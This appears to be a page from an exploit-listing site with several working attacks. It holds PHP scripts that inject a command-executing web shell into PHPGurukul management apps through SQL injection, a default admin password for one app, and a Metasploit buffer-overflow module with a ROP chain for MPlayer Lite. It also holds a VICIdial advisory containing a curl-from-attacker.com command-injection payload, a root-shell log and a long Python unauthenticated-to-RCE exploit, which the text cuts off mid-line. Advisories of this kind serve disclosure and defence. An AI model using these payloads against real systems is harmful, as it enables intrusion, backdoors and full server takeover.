Latest exploits :: CodePwn

<pre><code>============================================================================================================================================= | # Title : COVID19 - Testing Management System 1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload inject php code contains a back door. [+] Line 16 + 19 Set your Target. [+] save payload as poc.php [+] usage from cmd : C:\www\test>php 1.php [+] payload : <?php // المكتبات المطلوبة function send_request($url, $data) { $options = [ 'http' => [ 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($data), ] ]; $context = stream_context_create($options); return file_get_contents($url, false, $context); } // تحديد URL ثابت $url = 'http://localhost/covid-tms/'; // مسار ثابت لرفع الملف $path = 'C:\www\covid-tms\uploaded.php'; $path = str_replace("\\", "\\\\", $path); // حمولة الباب الخلفي $backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'; // إرسال ملف PHP يحتوي على الباب الخلفي $payload = [ 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a", 'password' => 'test', 'login' => '' ]; send_request($url . "/login.php", $payload); echo "[+] PHP backdoor uploaded successfully at $path\n"; // تنفيذ ملف PHP المرفوع واختبار الباب الخلفي $response = file_get_contents($url . "uploaded.php?cmd=whoami"); echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n"; ?> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>============================================================================================================================================= | # Title : BP Monitoring Management System 1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/bp-monitoring-management-system-using-php-and-mysql/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload inject php code contains a back door. [+] Line 16 + 19 Set your Target. [+] save payload as poc.php [+] usage from cmd : C:\www\test>php 1.php [+] payload : <?php // المكتبات المطلوبة function send_request($url, $data) { $options = [ 'http' => [ 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($data), ] ]; $context = stream_context_create($options); return file_get_contents($url, false, $context); } // تحديد URL ثابت $url = 'http://localhost/bpmms/'; // مسار ثابت لرفع الملف $path = 'C:\www\bpmms\uploaded.php'; $path = str_replace("\\", "\\\\", $path); // حمولة الباب الخلفي $backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'; // إرسال ملف PHP يحتوي على الباب الخلفي $payload = [ 'emailid' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a", 'userpassword' => 'test', 'login' => '' ]; send_request($url . "/login.php", $payload); echo "[+] PHP backdoor uploaded successfully at $path\n"; // تنفيذ ملف PHP المرفوع واختبار الباب الخلفي $response = file_get_contents($url . "uploaded.php?cmd=whoami"); echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n"; ?> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Bank Locker Management System 1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : Username: admin Password: Test@123 [+] http://127.0.0.1/blms/banker/dashboard.php Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>============================================================================================================================================= | # Title : Art Gallery Management System 1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload inject php code contains a back door. [+] Line 16 + 19 Set your Target. [+] save payload as poc.php [+] usage from cmd : C:\www\test>php 1.php [+] payload : <?php // المكتبات المطلوبة function send_request($url, $data) { $options = [ 'http' => [ 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($data), ] ]; $context = stream_context_create($options); return file_get_contents($url, false, $context); } // تحديد URL ثابت $url = 'http://localhost/agms/'; // مسار ثابت لرفع الملف $path = 'C:\www\agms\uploaded.php'; $path = str_replace("\\", "\\\\", $path); // حمولة الباب الخلفي $backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'; // إرسال ملف PHP يحتوي على الباب الخلفي $payload = [ 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a", 'password' => 'test', 'login' => '' ]; send_request($url . "/admin/login.php", $payload); echo "[+] PHP backdoor uploaded successfully at $path\n"; // تنفيذ ملف PHP المرفوع واختبار الباب الخلفي $response = file_get_contents($url . "uploaded.php?cmd=whoami"); echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n"; ?> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'MPlayer Lite M3U Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability in MPlayer Lite r33064, caused by improper bounds checking of an URL entry. By persuading the victim to open a specially-crafted .M3U file, specifically by drag-and-dropping it to the player, a remote attacker can execute arbitrary code on the system. }, 'License' => MSF_LICENSE, 'Author' => [ 'C4SS!0 and h1ch4m', # Vulnerability discovery and original exploit 'Gabor Seljan', # Metasploit module ], 'References' => [ [ 'BID', '46926' ], [ 'EDB', '17013' ], [ 'URL', 'http://www.mplayer-ww.com/eng/' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x20\x0d\x0a\x1a\x2c\x2e\x26\x2f\x3a\x3e\x3f\x5c", 'Space' => 5040 }, 'Targets' => [ [ 'Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064', { 'Offset' => 21, 'Ret' => 0x649a7bbe # ADD ESP,64C # PPPR [avformat-52.dll] } ], ], 'Privileged' => false, 'DisclosureDate' => '2011-03-19', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']) ], self.class) end def junk return rand_text_alpha(4).unpack("V").first end def nops return make_nops(4).unpack("V").first end def exploit # ROP chain generated by mona.py - See corelan.be rop_gadgets = [ 0x6ad9d85d, # POP EBP # RETN [avcodec-52.dll] 0x10018fc3, # &CALL ESP [unrar.dll] 0x64984a70, # POP EAX # RETN [avformat-52.dll] 0xffffec4f, # Value to negate, will become 0x00005040 0x6b0ce791, # NEG EAX # RETN [avcodec-52.dll] 0x6b063c7d, # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll] junk, junk, 0x1001d154, # POP EAX # RETN [unrar.dll] 0x77e71210, # &VirtualProtect() [IAT RPCRT4.dll] 0x64987f7f, # MOV EAX,DWORD PTR DS:[EAX] # RETN [avformat-52.dll] 0x6afcdc68, # XCHG EAX,ESI # RETN [avcodec-52.dll] 0x6b02836d, # POP EAX # RETN [avcodec-52.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x6b0ce791, # NEG EAX # RETN [avcodec-52.dll] 0x6af79d80, # XCHG EAX,EDX # RETN [avcodec-52.dll] 0x1001bad6, # POP ECX # RETN [unrar.dll] 0x649eab48, # &Writable location [avformat-52.dll] 0x6d7c0bb7, # POP EDI # RETN [swscale-0.dll] 0x6b03d722, # RETN (ROP NOP) [avcodec-52.dll] 0x64984a70, # POP EAX # RETN [avformat-52.dll] nops, 0x6d7c57d1 # PUSHAD # RETN [swscale-0.dll] ].flatten.pack('V*') sploit = rand_text_alpha_upper(target['Offset']) sploit << rop_gadgets sploit << payload.encoded sploit << generate_seh_record(target.ret) sploit << rand_text_alpha_upper(1000) # Generate exception # Create the file print_status("Creating '#{datastore['FILENAME']}' file ...") file_create("http://" + sploit) end end </code></pre>

<pre><code>KL-001-2024-012: VICIdial Authenticated Remote Code Execution Title: VICIdial Authenticated Remote Code Execution Advisory ID: KL-001-2024-012 Publication Date: 2024-09-10 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-012.txt 1. Vulnerability Details Affected Vendor: VICIdial Affected Product: VICIdial Affected Version: 2.14-917a Platform: GNU/Linux CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CVE ID: CVE-2024-8504 2. Vulnerability Description An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective. 3. Technical Description VICIdial is an open-source contact center suite, mainly used by call centers. The "vicidial.com" website boasts over 14,000 registered installations. There is a public SVN repository to access the source code, as well as an ISO that can be used to install the software. The ISO was used in a virtual machine for testing purposes. Users can be added to specific "groups" that enable them to log into the "agent" web client if that group is associated with a "campaign". This web client is for agents to manage inbound and outbound phone calls, displaying pertinent information regarding the "lead", such as the personal information of the individual on the other end of the call. An agent has the ability to record the phone call using the "START RECORDING" button. When clicked, an HTTP request is sent to the server which is processed by the "manager_send.php" PHP script. The "filename" parameter included in the request is sanitized with the "preg_replace" PHP function to prevent SQL injection, as shown by this snippet: if (isset($_GET["filename"])) {$filename=$_GET["filename"];} elseif (isset($_POST["filename"])) {$filename=$_POST["filename"];} ... $filename = preg_replace("/\'|\"|\\\\|;/","",$filename); The regular expression used to sanitize this parameter is very permissive, only removing single quotes, double quotes, backslashes, and semicolons. Later in the execution of "manager_send.php", the "filename" variable is added to a SQL database through an "INSERT" statement, along with other user-controlled variables such as "exten": $stmt="INSERT INTO vicidial_manager values('','','$NOW_TIME', 'NEW','N','$server_ip','','Originate','$vmgr_callerid', 'Channel: $channel','Context: $ext_context', 'Exten: $exten','Priority: $ext_priority', 'Callerid: $filename','','','','','');"; if ($format=='debug') {echo "\n";} $rslt=mysql_to_mysqli($stmt, $link); On the server-side, an asyncronous cron job is executing the perl script "ADMIN_keepalive_ALL.pl": vicibox11:/ # crontab -l | grep keepalive ### keepalive script for astguiclient processes * * * * * /usr/share/astguiclient/ADMIN_keepalive_ALL.pl This perl script ensures several worker perl scripts are running. Included in these worker perl scripts is "AST_manager_send.pl", as shown by this snippet from "ADMIN_keepalive_ALL.pl": if ($psline[1] =~ /AST_manager_se/) { $runningAST_send++; if ($DB) {print "AST_send RUNNING: |$psline[1]|\n";} } ... if ( ($AST_send_listen > 0) && ($runningAST_send < 1) ) { if ($DB) {print "starting AST_manager_send...\n";} # add a '-L' to the command below to activate logging `/usr/bin/screen -d -m -S ASTsend $PATHhome/AST_manager_send.pl $debug_string`; The "AST_manager_send.pl" script will continuously monitor the "vicidial_manager" table in the SQL database for records with the "status" column equal the string "NEW". Values from that row are then URL-encoded and used as command-line arguments to invoke the "AST_send_action_child.pl" perl script: while ($endless_loop > 0) { my $stmtA = "SELECT count(*) from vicidial_manager where server_ip = '" . $conf{VARserver_ip} . "' and status = 'NEW';"; ... $originate_command .= $vdm->{cmd_line_e} . "\n" if ($vdm->{cmd_line_e}); $originate_command .= $vdm->{cmd_line_f} . "\n" if ($vdm->{cmd_line_f}); $originate_command .= $vdm->{cmd_line_g} . "\n" if ($vdm->{cmd_line_g}); ... $vdm->{cmd_line_e} =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; $vdm->{cmd_line_f} =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; $vdm->{cmd_line_g} =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; ... $launch .= " --cmd_line_e=" . $vdm->{cmd_line_e} if ($vdm->{cmd_line_e}); $launch .= " --cmd_line_f=" . $vdm->{cmd_line_f} if ($vdm->{cmd_line_f}); $launch .= " --cmd_line_g=" . $vdm->{cmd_line_g} if ($vdm->{cmd_line_g}); ... $launch .= " >> " . $conf{PATHlogs} . "/action_send." . logDate() if ($SYSLOG); system($launch . ' &'); The "AST_send_action_child.pl" will then initiate a telnet connection to the "Asterisk Call Manager" and issue various commands as they appear in the command-line arguments: my $tn = new Net::Telnet (Port => $telnet_port, Prompt => '/\r\n/', Output_record_separator => '', Errmode => "return"); ... $tn->open("$telnet_host"); $tn->waitfor('/Asterisk Call Manager\//'); ... $originate_command .= $cmd_line_e . "\n" if ($cmd_line_e); $originate_command .= $cmd_line_f . "\n" if ($cmd_line_f); $originate_command .= $cmd_line_g . "\n" if ($cmd_line_g); ... my @list_channels = $tn->cmd(String => $originate_command, Prompt => '/.*/'); These commands are then processed by the Asterisk Management interface (AMI). The configuration file "extensions-vicidial.conf" contains useful information on how AMI processes the value of the user-controlled "Exten" command. The following is a relevant snippet: exten => 8309,1,Answer exten => 8309,2,Monitor(wav,${CALLERID(name)}) exten => 8309,3,Wait(3600) exten => 8309,4,Hangup() ... When supplying an "Exten" value of "8309", the "Monitor" application is invoked, which will record the current call and write the recorded data into a file. The default directory is "/var/spool/asterisk/monitor". In this case, the name of the file is derived from the "CALLERID", which is also user-controlled. This can be leveraged by an attacker to write file names that contain malicious shell commands. Take for example the following HTTP request: POST /agc/manager_send.php HTTP/1.1 Host: REDACTED Content-Length: 279 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 server_ip=REDACTED&session_name=1716765726_8300defaul17394646&user=korelogic&pass=korelogic&ACTION=MonitorConf&format=text&channel=Local/58600051@default&filename=3133731337$(id>foobar.txt)&exten=8309&ext_context=default&lead_id=&ext_priority=1&FROMvdc=YES&uniqueid=&FROMapi= Two files are created within the "/var/spool/asterisk/monitor" directory: vicibox11:/ # ls -l /var/spool/asterisk/monitor total 216 -rw-r--r-- 1 root root 213164 May 30 05:30 \ 3133731337$(id>foobar.txt)-in.wav -rw-r--r-- 1 root root 44 May 30 05:30 \ 3133731337$(id>foobar.txt)-out.wav Additionally, the "AST_CRON_audio_1_move_VDonly.pl" perl script is executed every 3 minutes: vicibox11:/ # crontab -l | grep VDonly 0,3,6,9,12,15,18,21,24,27,30,33,36,39,42,45,48,51,54,57 * * * * \ /usr/share/astguiclient/AST_CRON_audio_1_move_VDonly.pl This script searches for WAV/GSM files within the Asterisk monitor directory and uses the file names to execute several shell commands: foreach(@FILES) { ... $INfile = $FILES[$i]; ... if (!$T) { `mv -f "$dir1/$INfile" "$dir2/$ALLfile"`; `rm -f "$dir1/$OUTfile"`; } The malicious file name is then inserted into the "mv" command. The attacker controlled "id" command is executed and the output is redirected to the file "foo.txt": vicibox11:/ # ls -l /root/foobar.txt -rw-r--r-- 1 root root 39 May 30 05:33 /root/foobar.txt 4. Mitigation and Remediation Recommendation This issue has been remediated in the public svn/trunk codebase, as of revision 3848 committed 2024-07-08. 5. Credit This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc. 6. Disclosure Timeline 2024-07-05 : KoreLogic requests security contact from support@vicidial.com. 2024-07-08 : KoreLogic reports vulnerability details to VICIdial contact. 2024-07-08 : VICIdial notifies KoreLogic that the issue has been remediated with revision 3848 in the public Subversion repository. 2024-07-11 : KoreLogic confirms this vulnerability has been remediated. KoreLogic asks VICIdial if it is appropriate to publicly disclose the vulnerability details at this time. 2024-07-11 : VICIdial requests four weeks of embargo in order to upgrade supported customers. 2024-08-05 : KoreLogic asks VICIdial if it is appropriate to publicly disclose the vulnerability details at this time. 2024-08-09 : VICIdial requests an additional two weeks of embargo. 2024-09-10 : KoreLogic public disclosure. 7. Proof of Concept Instead of executing the "id" command, a malicious bash script can be downloaded and executing using the cURL utility. The following file name is an example: $(curl$IFS@attacker.com$IFS-o$IFS.c&&bash$IFS.c) This issue can be chained with KL-001-2024-011 (unauthenticated SQL injection) to execute arbitrary shell commands as the root user from an unauthenticated perspective: [goon@security exploits]$ python unauth2rce.py -rh 192.168.2.136 -rp 443 -wh 192.168.2.65 -wp 3000 -lh 192.168.2.65 -lp 1337 --bind [+] Target appears vulnerable to time-based SQL injection [~] Enumerating administrator credentials [~] 6 [~] 66 [~] 666 [~] 6666 [+] Username: 6666 [~] J [~] JA [~] JAB [~] JAB1 [~] JAB18 [~] JAB181 [~] JAB181M [~] JAB181MA [~] JAB181MAB [~] JAB181MAB1 [~] JAB181MAB17 [~] JAB181MAB178 [~] JAB181MAB178_ [~] JAB181MAB178_L [~] JAB181MAB178_LA [~] JAB181MAB178_LAn [+] Password: JAB181MAB178_LAn [+] Authenticated successfully as user "6666" [+] Updated user settings to increase privileges [+] Updated system settings [+] Created dummy campaign "korelogic_campaign" [+] Updated dummy campaign settings [+] Created dummy list for campaign [+] Found phone credentials: callin:test [+] Entered "manager" credentials to override shift enforcement [+] Authenticated as agent using phone credentials [~] Listening for incoming connections... [+] Received cURL request from 192.168.2.136 Connection from 192.168.2.136:56980 vicibox11:~ # id uid=0(root) gid=0(root) groups=0(root) ######################### ## unauth2rce.py ## ######################### import os import re import socket import string import random import urllib3 import argparse import requests import threading from base64 import b64encode from bs4 import BeautifulSoup urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class Exploit: def __init__(self, rhost, rport, whost, wport, lhost=None, lport=None, bind=False, proxy=None): """ This 'sleep' duration is derived by the average response time multiplied by this value. A server with an average response time of 10ms is given a 'sleep' duration of 300ms. Tune as needed. """ self.SLEEP_MULTIPLIER = 30 self.REQUEST_HEADERS = {'User-Agent': 'KoreLogic'} self.ALLOWED_SCHEMES = ['http', 'https'] if proxy: self.REQUEST_PROXIES = { 'http': proxy, 'https': proxy } else: self.REQUEST_PROXIES = {} self.TARGET_IP = rhost self.TARGET_PORT = rport self.PAYLOAD_WEBSERVER_HOST = whost self.PAYLOAD_WEBSERVER_PORT = wport self.REVERSE_SHELL_HOST = lhost self.REVERSE_SHELL_PORT = lport self.BIND = bind self.VICIDIAL_FINGERPRINT = 'Please Hold while I redirect you!' self.RANDOM_CHARSET = string.ascii_uppercase + string.digits # returns a URI with 'http' or 'https' def determine_target_uri(self): for scheme in self.ALLOWED_SCHEMES: target_uri = f'{scheme}://{self.TARGET_IP}:{self.TARGET_PORT}' try: response = requests.get(target_uri, headers=self.REQUEST_HEADERS, verify=False) if self.VICIDIAL_FINGERPRINT in response.text: return target_uri except: pass # returns a session object with custom proxies/headers if supplied def build_requests_session(self): self.base_uri = self.determine_target_uri() session = requests.Session() session.proxies = self.REQUEST_PROXIES session.verify = False return session # returns a random string of a given length def random(self, length): return ''.join(random.choice(self.RANDOM_CHARSET) for _ in range(length)) # returns a timedelta representing the response time of an injected SQL query def time_sql_query(self, query, session): username = f"goolicker', '', ({query}));# " credentials = f'{username}:password' credentials_base64 = b64encode(credentials.encode()).decode() auth_header = f'Basic {credentials_base64}' target_uri = f'{self.base_uri}/VERM/VERM_AJAX_functions.php' request_params = {'function': 'log_custom_report', self.random(5): self.random(5)} request_headers = {**self.REQUEST_HEADERS, 'Authorization': auth_header} response = session.get(target_uri, params=request_params, headers=request_headers) return response.elapsed # returns a boolean if time-based SQL injection is possible, additionally # sets the best 'sleep' duration based on response times def is_vulnerable(self, session, baseline_iterations=5): # determine average baseline response time zero_sleep_query = f'SELECT (NULL)' total_baseline_time = 0 for _ in range(baseline_iterations): execution_time = self.time_sql_query(zero_sleep_query, session) total_baseline_time += execution_time.total_seconds() average_baseline_response_time = total_baseline_time / baseline_iterations self.sql_baseline_time = average_baseline_response_time # determine if injected sleep query impacts response time sleep_length = round(average_baseline_response_time * self.SLEEP_MULTIPLIER, 2) sleep_query = f'SELECT (sleep({sleep_length}))' execution_time = self.time_sql_query(sleep_query, session) if execution_time.total_seconds() >= sleep_length: self.sql_sleep_length = sleep_length return True else: return False # determine if a character at a specific indice of a query result returns a # boolean 'true' when compared to a given character using the supplied operator def check_indice_of_query_result(self, session, query, indice, operator, ordinal): parent_query = f'SELECT IF(ORD((SUBSTRING(({query}), {indice}, {indice}))){operator}{ordinal}, sleep({self.sql_sleep_length}), null)' execution_time = self.time_sql_query(parent_query, session) return execution_time.total_seconds() >= (self.sql_baseline_time * self.SLEEP_MULTIPLIER) def enumerate_sql_query(self, session, query='SELECT @@version', charset=string.printable): # convert charset to ordinals all_characters = sorted([ord(char) for char in charset]) reduced_characters = all_characters # use a binary search and enumerate query results result = '' indice = 1 indice_could_be_null = True while True: """ we check if the value is NULL once per indice to determine when a string ends. this adds one request per indice, but since every boolean 'true' results in a delay this is faster than counting the length of the string before enumrating. """ if indice_could_be_null: if self.check_indice_of_query_result(session, query, indice, '=', '0'): break else: indice_could_be_null = False # enumerate each character of query result with a binary search middle_indice = len(reduced_characters) // 2 middle_ordinal = reduced_characters[middle_indice] if self.check_indice_of_query_result(session, query, indice, '<=', middle_ordinal): if self.check_indice_of_query_result(session, query, indice, '=', middle_ordinal): reduced_characters = all_characters result += chr(middle_ordinal) indice += 1 indice_could_be_null = True print(f'[~] {result}') else: reduced_characters = reduced_characters[:middle_indice] else: reduced_characters = reduced_characters[middle_indice:] return result def poison_recording_files(self, session, username, password): # authenticate using administrator credentials credentials = f'{username}:{password}' credentials_base64 = b64encode(credentials.encode()).decode() auth_header = f'Basic {credentials_base64}' target_uri = f'{self.base_uri}/vicidial/admin.php' request_params = {'ADD': '3', 'user': username} request_headers = {**self.REQUEST_HEADERS, 'Authorization': auth_header} response = session.get(target_uri, params=request_params, headers=request_headers) if response.status_code == 200: print(f'[+] Authenticated successfully as user "{username}"') else: print('[-] Failed to authenticate with credentials. Maybe hashing is enabled?') return # update user settings to increase privileges beyond default administrator user_settings_body = { "ADD":"4A","custom_fields_modify":"0","user":username,"DB":"0","pass":password, "force_change_password":"N","full_name":"KoreLogic","user_level":"9", "user_group":"ADMIN","phone_login":"KoreLogic","phone_pass":"KoreLogic", "active":"Y","voicemail_id":"","email":"","mobile_number":"","user_code":"", "user_location":"","user_group_two":"","territory":"","user_nickname":"", "user_new_lead_limit":"-1","agent_choose_ingroups":"1","agent_choose_blended":"1", "hotkeys_active":"0","scheduled_callbacks":"1","agentonly_callbacks":"0", "next_dial_my_callbacks":"NOT_ACTIVE","agentcall_manual":"0","manual_dial_filter":"DISABLED", "agentcall_email":"0","agentcall_chat":"0","vicidial_recording":"1","vicidial_transfers":"1", "closer_default_blended":"0","user_choose_language":"0","selected_language":"default+English", "vicidial_recording_override":"DISABLED","mute_recordings":"DISABLED", "alter_custdata_override":"NOT_ACTIVE","alter_custphone_override":"NOT_ACTIVE", "agent_shift_enforcement_override":"ALL","agent_call_log_view_override":"Y", "hide_call_log_info":"Y","agent_lead_search":"NOT_ACTIVE","lead_filter_id":"NONE", "user_hide_realtime":"0","allow_alerts":"0","preset_contact_search":"NOT_ACTIVE", "max_inbound_calls":"0","max_inbound_filter_enabled":"0","max_inbound_filter_min_sec":"-1", "inbound_credits":"-1","max_hopper_calls":"0","max_hopper_calls_hour":"0", "wrapup_seconds_override":"-1","ready_max_logout":"-1","status_group_id":"", "campaign_js_rank_select":"","campaign_js_grade_select":"","ingroup_js_rank_select":"", "ingroup_js_grade_select":"","RANK_AGENTDIRECT":"0","GRADE_AGENTDIRECT":"10", "LIMIT_AGENTDIRECT":"-1","WEB_AGENTDIRECT":"","RANK_AGENTDIRECT_CHAT":"0", "GRADE_AGENTDIRECT_CHAT":"10","LIMIT_AGENTDIRECT_CHAT":"-1","WEB_AGENTDIRECT_CHAT":"", "custom_one":"","custom_two":"","custom_three":"","custom_four":"","custom_five":"", "qc_enabled":"0","qc_user_level":"1","qc_pass":"0","qc_finish":"0","qc_commit":"0", "hci_enabled":"0","realtime_block_user_info":"0","admin_hide_lead_data":"0", "admin_hide_phone_data":"0","ignore_group_on_search":"0","user_admin_redirect_url":"", "view_reports":"1","access_recordings":"0","alter_agent_interface_options":"1", "modify_users":"1","change_agent_campaign":"1","delete_users":"1","modify_usergroups":"1", "delete_user_groups":"1","modify_lists":"1","delete_lists":"1","load_leads":"1", "modify_leads":"1","export_gdpr_leads":"0","download_lists":"1","export_reports":"1", "delete_from_dnc":"1","modify_campaigns":"1","campaign_detail":"1","modify_dial_prefix":"1", "delete_campaigns":"1","modify_ingroups":"1","delete_ingroups":"1","modify_inbound_dids":"1", "delete_inbound_dids":"1","modify_custom_dialplans":"1","modify_remoteagents":"1", "delete_remote_agents":"1","modify_scripts":"1","delete_scripts":"1","modify_filters":"1", "delete_filters":"1","ast_admin_access":"1","ast_delete_phones":"1","modify_call_times":"1", "delete_call_times":"1","modify_servers":"1","modify_shifts":"1","modify_phones":"1", "modify_carriers":"1","modify_email_accounts":"0","modify_labels":"1","modify_colors":"1", "modify_languages":"0","modify_statuses":"1","modify_voicemail":"1","modify_audiostore":"1", "modify_moh":"1","modify_tts":"1","modify_contacts":"1","callcard_admin":"1", "modify_auto_reports":"0","add_timeclock_log":"1","modify_timeclock_log":"1", "delete_timeclock_log":"1","manager_shift_enforcement_override":"1","pause_code_approval":"1", "admin_cf_show_hidden":"0","modify_ip_lists":"0","ignore_ip_list":"0", "two_factor_override":"NOT_ACTIVE","vdc_agent_api_access":"1","api_list_restrict":"0", "api_allowed_functions%5B%5D":"ALL_FUNCTIONS","api_only_user":"0","modify_same_user_level":"1", "download_invalid_files":"1","alter_admin_interface_options":"1","SUBMIT":"SUBMIT" } response = session.post(target_uri, headers=request_headers, data=user_settings_body) print('[+] Updated user settings to increase privileges') # update system settings without clobbering existing configuration response = session.get(target_uri, headers=request_headers, params={'ADD':'311111111111111'}) soup = BeautifulSoup(response.text, 'html.parser') form_tag = soup.find('form') system_settings_body = {} for input_tag in form_tag.find_all('input'): setting_name = input_tag['name'] setting_value = input_tag['value'] system_settings_body[setting_name] = setting_value for select_tag in form_tag.find_all('select'): setting_name = select_tag['name'] selected_tag = select_tag.find('option', selected=True) if not selected_tag: continue setting_value = selected_tag.text system_settings_body[setting_name] = setting_value system_settings_body['outbound_autodial_active'] = '0' response = session.post(target_uri, headers=request_headers, data=system_settings_body) print('[+] Updated system settings') # create dummy campaign campaign_settings_body = { "ADD":"21","park_ext":"","campaign_id":"313373","campaign_name":"korelogic_campaign", "campaign_description":"","user_group":"---ALL---","active":"Y","park_file_name":"", "web_form_address":"","allow_closers":"Y","hopper_level":"1","auto_dial_level":"0", "next_agent_call":"random","local_call_time":"12pm-5pm","voicemail_ext":"","script_id":"", "get_call_launch":"NONE","SUBMIT":"SUBMIT" } response = session.post(target_uri, headers=request_headers, data=campaign_settings_body) print('[+] Created dummy campaign "korelogic_campaign"') # update dummy campaign update_campaign_body = { "ADD":"41","campaign_id":"313373","old_campaign_allow_inbound":"Y", "campaign_name":"korelogic_campaign","active":"Y","dial_status":"","lead_order":"DOWN", "list_order_mix":"DISABLED","lead_filter_id":"NONE", "no_hopper_leads_logins":"Y", "hopper_level":"1","reset_hopper":"N","dial_method":"RATIO","auto_dial_level":"1", "adaptive_intensity":"0","SUBMIT":"SUBMIT","form_end":"END" } response = session.post(target_uri, headers=request_headers, data=update_campaign_body) print('[+] Updated dummy campaign settings') # create dummy list list_settings_body = { "ADD":"211","list_id":"313374","list_name":"korelogic_list","list_description":"", "campaign_id":"313373","active":"Y","SUBMIT":"SUBMIT" } response = session.post(target_uri, headers=request_headers, data=list_settings_body) print('[+] Created dummy list for campaign') # fetch credentials for a phone login response = session.get(target_uri, headers=request_headers, params={'ADD':'10000000000'}) soup = BeautifulSoup(response.text, 'html.parser') phone_uri_path = soup.find('a', string='MODIFY')['href'] response = session.get(f'{self.base_uri}{phone_uri_path}', headers=request_headers) soup = BeautifulSoup(response.text, 'html.parser') phone_extension = soup.find('input', {'name': 'extension'})['value'] phone_password = soup.find('input', {'name': 'pass'})['value'] recording_extension = soup.find('input', {'name': 'recording_exten'})['value'] print(f'[+] Found phone credentials: {phone_extension}:{phone_password}') # authenticate to agent portal with phone credentials manager_login_body = { "DB":"0","JS_browser_height":"1313","JS_browser_width":"2560","phone_login":phone_extension, "phone_pass":phone_password,"LOGINvarONE":"","LOGINvarTWO":"","LOGINvarTHREE":"","LOGINvarFOUR":"", "LOGINvarFIVE":"","hide_relogin_fields":"","VD_login":username,"VD_pass":password, "MGR_override":"1","relogin":"YES","VD_login":username,"VD_pass":password, "MGR_login20240530":username,"MGR_pass20240530":password,"SUBMIT":"SUBMIT" } response = session.post(f'{self.base_uri}/agc/vicidial.php', headers=request_headers, data=manager_login_body) print(f'[+] Entered "manager" credentials to override shift enforcement') agent_login_body = { "DB":"0","JS_browser_height":"1313","JS_browser_width":"2560","admin_test":"","LOGINvarONE":"", "LOGINvarTWO":"","LOGINvarTHREE":"","LOGINvarFOUR":"","LOGINvarFIVE":"","phone_login":phone_extension, "phone_pass":phone_password,"VD_login":username,"VD_pass":password,"VD_campaign":"313373", } response = session.post(f'{self.base_uri}/agc/vicidial.php', headers=request_headers, data=agent_login_body) print(f'[+] Authenticated as agent using phone credentials') # insert malicious recording session_name = re.findall(r"var session_name = '([a-zA-Z0-9_]+?)';", response.text)[0] session_id = re.findall(r"var session_id = '([0-9]+?)';", response.text)[0] malicious_filename = 